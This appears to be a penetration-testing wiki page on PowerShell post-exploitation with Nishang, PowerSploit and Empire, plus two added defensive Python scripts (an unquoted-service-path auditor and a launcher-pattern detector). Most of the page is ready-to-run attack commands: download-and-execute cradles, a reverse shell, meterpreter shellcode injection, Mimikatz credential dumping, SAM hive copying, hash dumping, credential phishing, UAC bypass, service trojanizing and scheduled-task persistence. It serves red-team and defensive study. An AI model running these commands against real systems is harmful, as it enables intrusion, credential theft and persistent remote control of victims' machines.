PowerShell frameworks for Post-exploitation

Penetration Testing Wiki

In this section we review the PowerShell frameworks that support the post-exploitation phase.

Intro to PowerShell

To check the version:

$PSVersionTable.PSVersion

PowerShell v1.0: Win XP SP2, 2003 Server SP1, Vista
PowerShell v2.0: Win 7, Server 2008 R2
PowerShell v3.0: Win 8, Server 2012
PowerShell v4.0: Win 8.1, Server 2012 R2
PowerShell v5.0: Win 10

Change default colors:

$host.ui.RawUI.ForegroundColor = "black"
$host.ui.RawUI.BackgroundColor = "white"
clear

To compile a .ps1 into an .exe use "PowerGUI Pro script editor".

  • List hotfixes

Get-HotFix

Equivalent using wmic:

wmic qfe list

  • Detect sandboxed environment

Get-WmiObject Win32_BIOS | Format-List Name,SerialNumber

  • Handling Certificates

To see installed user certificates

Get-ChildItem -Path "Cert:\CurrentUser\My"
Get-ChildItem -Path "Cert:\LocalMachine"

Using GUI:

certmgr.msc

To create a self-signed certificate:

$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org
  • Show system uptime:

Get-CimInstance -ClassName Win32_OperatingSystem | Select-Object CSName, LastBootUpTime

Some examples of PowerShell Scripts

Capturing a screenshot

# Usage: .\<script>.ps1 -Path C:\Temp   (the target folder must already exist)
Param(
    [Parameter(Mandatory = $true)][string]$Path
)
# File name: <hostname> - <timestamp>.bmp
$FileName = "$env:COMPUTERNAME - $(Get-Date -f yyyy-MM-dd_HHmmss).bmp"
$File = "$Path\$FileName"
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
# VirtualScreen spans all attached monitors, so Left/Top can be negative on multi-monitor setups
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
# Copy the whole virtual screen into the bitmap, starting at its top-left corner
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$bitmap.Save($File)
# Release the GDI+ handles
$graphic.Dispose()
$bitmap.Dispose()
Write-Output "Screenshot saved to:"
Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/

Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

In Kali the scripts are under /usr/share/nishang.

powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress 192.168.56.101 -EndAddress 192.168.56.105 -ResolveHost -ScanPort }"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"

Fileless execution with nishang:

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"

Does not work in Windows 7:

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

In Windows 7:

powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowerShellTcp.ps1; Invoke-PowerShellTcp -IPAddress $LOCALIP -Reverse -Port 443"

Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA

Powersploit Framework

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1"); Invoke-ReverseDnsLookup -IpRange $IP/24
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds
IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1"); Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"

Powersploit modules: PowerUP

PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp's escalation functionality in the privesc/powerup/* modules.

powershell.exe -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
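
One of the checks PowerUp runs against services is for an unquoted ImagePath that contains spaces: Windows resolves such a path by trying each space-delimited prefix as an executable before reaching the real binary. The following Python script is an added example and not PowerUp's own code. It applies that check to constructed sample service paths (the service names and paths are made up for the example), lists the locations Windows would probe so an administrator can confirm none of them is writable by standard users, and produces the quoted binPath that closes the finding.

```python
"""Audit service ImagePath values for the unquoted-path-with-spaces weakness (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample services (names and paths are made up); on a live host these strings are the
# PathName / ImagePath values of each service.
SAMPLE_SERVICES: Dict[str, str] = {
    "GoodSvc": '"C:\\Program Files\\Good Vendor\\svc.exe" -run',
    "BadSvc": "C:\\Program Files\\Bad Vendor\\Tools\\agent.exe -run",
    "SystemSvc": "C:\\Windows\\System32\\svchost.exe -k netsvcs",
    "NoSpaceSvc": "C:\\Tools\\agent.exe",
}

# Split an unquoted value at the first ".exe": group 1 is the executable, group 2 the arguments.
EXE_SPLIT = re.compile(r"(?i)^(.*?\.exe)(.*)$")


@dataclass
class ServicePathResult:
    name: str
    image_path: str
    executable: str
    unquoted_with_spaces: bool
    probe_locations: List[str] = field(default_factory=list)


def split_image_path(image_path: str) -> Tuple[str, str, bool]:
    """Return (executable, arguments, was_quoted) for a service ImagePath string."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        if end == -1:
            raise ValueError("unterminated quote in ImagePath: %r" % image_path)
        return path[1:end], path[end + 1:], True
    match = EXE_SPLIT.match(path)
    if match is None:
        return path, "", False  # no .exe in the value: treat the whole string as the executable
    return match.group(1), match.group(2), False


def probe_locations(executable: str) -> List[str]:
    """Executables Windows tries, in order, for an unquoted path: each prefix that ends at a
    space with '.exe' appended, and finally the full path itself."""
    locations = []
    idx = executable.find(" ")
    while idx != -1:
        locations.append(executable[:idx] + ".exe")
        idx = executable.find(" ", idx + 1)
    locations.append(executable)
    return locations


def audit_service(name: str, image_path: str) -> ServicePathResult:
    """Flag the service when its executable path is unquoted and contains a space."""
    executable, _args, quoted = split_image_path(image_path)
    vulnerable = (not quoted) and (" " in executable)
    return ServicePathResult(
        name=name,
        image_path=image_path,
        executable=executable,
        unquoted_with_spaces=vulnerable,
        probe_locations=probe_locations(executable) if vulnerable else [],
    )


def audit_services(services: Dict[str, str]) -> List[ServicePathResult]:
    return [audit_service(name, path) for name, path in services.items()]


def quote_image_path(image_path: str) -> str:
    """Remediated ImagePath: the executable wrapped in double quotes, arguments unchanged."""
    executable, args, quoted = split_image_path(image_path)
    if quoted:
        return image_path.strip()
    return '"%s"%s' % (executable, args)


if __name__ == "__main__":
    for result in audit_services(SAMPLE_SERVICES):
        if result.unquoted_with_spaces:
            print(result.name, "UNQUOTED:", result.image_path)
            for location in result.probe_locations:
                print("    verify ACL on:", location)
            print("    fix binPath to:", quote_image_path(result.image_path))
```

On a live host the same strings come from `Get-WmiObject Win32_Service | Select-Object Name, PathName`, and the corrected value is applied with `sc.exe config <name> binPath= ...` (the inner double quotes must be escaped for cmd.exe).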

Powersploit modules: BypassUAC

Import-Module .\bypass-uac.ps1

Does not work for Windows Server 2012:

Bypass-UAC -Method UacMethodSysprep

Works for Windows Server 2012:

Bypass-UAC -Method ucmDismMethod
Bypass-UAC -Method UacMethodMMC2

More info:

Powersploit modules: Trojanize DLL

See also Msfvenom Payloads Cheat Sheet.

Powersploit modules: Trojanize Windows Service

Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/

Empire Framework

Empire is a PowerShell and Python post-exploitation agent.

Installation:

git clone https://github.com/EmpireProject/Empire.git
cd Empire/
./setup/install.sh

Usage:

./empire
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==
(Empire: listeners/http) >

Run the generated PowerShell launcher on the Windows target to open a session in Empire:

powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==
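
The Nishang download cradles and the encoded Empire launcher shown on this page are also what a defender looks for in process-creation telemetry (the CommandLine field of Sysmon Event ID 1 or Security Event ID 4688). The following Python script is an added example, not part of this wiki or of Nishang or Empire. It scans constructed sample command lines for the indicators these launchers share (execution-policy bypass, hidden window, no profile, a WebClient download cradle, Invoke-Expression) and decodes an -EncodedCommand argument (base64 over UTF-16LE) so the payload inside can be inspected with the same patterns. The sample lines, the 10.0.0.5 address and the indicator names are constructed for the example and are not a standard taxonomy.

```python
"""Flag PowerShell launcher patterns in process command lines (added example)."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Decoded form of the constructed -EncodedCommand sample below (same cradle shape as the one-liners above).
ENCODED_PAYLOAD_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/stage.ps1')"

# Constructed sample command lines (not real telemetry): a Nishang-style cradle, an Empire-style
# encoded launcher, and a benign administrative command that must not be flagged.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Check-VM.ps1'); Check-VM\"",
    "powershell -noP -sta -w 1 -enc "
    + base64.b64encode(ENCODED_PAYLOAD_TEXT.encode("utf-16-le")).decode("ascii"),
    "powershell.exe -Command \"Get-HotFix | Out-File C:\\temp\\hotfixes.txt\"",
]

# Indicator names are this example's own labels.
INDICATOR_PATTERNS = {
    "execution-policy-bypass": re.compile(r"(?i)-(?:exec|ep|executionpolicy)\s+bypass"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+(?:1|hidden)\b"),
    "no-profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "download-cradle": re.compile(r"(?i)new-object\s+(?:system\.)?net\.webclient\)?\.download(?:string|file)"),
    "invoke-expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; -e, -ec and -enc are the usual ones.
ENCODED_COMMAND = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


@dataclass
class Finding:
    command_line: str
    indicators: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE text behind -EncodedCommand, a marker if it will not decode, or None."""
    match = ENCODED_COMMAND.search(command_line)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return "<undecodable -EncodedCommand argument>"


def analyze(command_line: str) -> Finding:
    """Collect indicators from the raw command line and, if present, from its decoded payload."""
    finding = Finding(command_line=command_line)
    decoded = decode_encoded_command(command_line)
    scan_text = command_line
    if decoded is not None:
        finding.indicators.append("encoded-command")
        finding.decoded_command = decoded
        scan_text += "\n" + decoded  # patterns hidden inside the payload still count
    for name, pattern in INDICATOR_PATTERNS.items():
        if pattern.search(scan_text):
            finding.indicators.append(name)
    return finding


def scan(command_lines) -> List[Finding]:
    """Return only the command lines that carry at least one indicator."""
    return [f for f in map(analyze, command_lines) if f.suspicious]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(finding.command_line[:60], "->", ", ".join(finding.indicators))
        if finding.decoded_command:
            print("    decoded:", finding.decoded_command)
```

The decoding step matters because an -enc launcher shows none of the cradle text on the raw command line; enabling PowerShell Script Block Logging (Event ID 4104) additionally records the decoded script content on the host regardless of how it was launched.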

To handle agents in Empire:

agents
interact $AGENTID
rename [old name] [new name]

Advanced modules:

bypassuac http
set Listener http
run

or disk-less:

usemodule privesc/bypassuac_wscript

For credentials gathering:

mimikatz

Persistence:

usemodule persistence/elevated/schtasks

References:

WinEnum

A Powershell Privilege Escalation Enumeration Script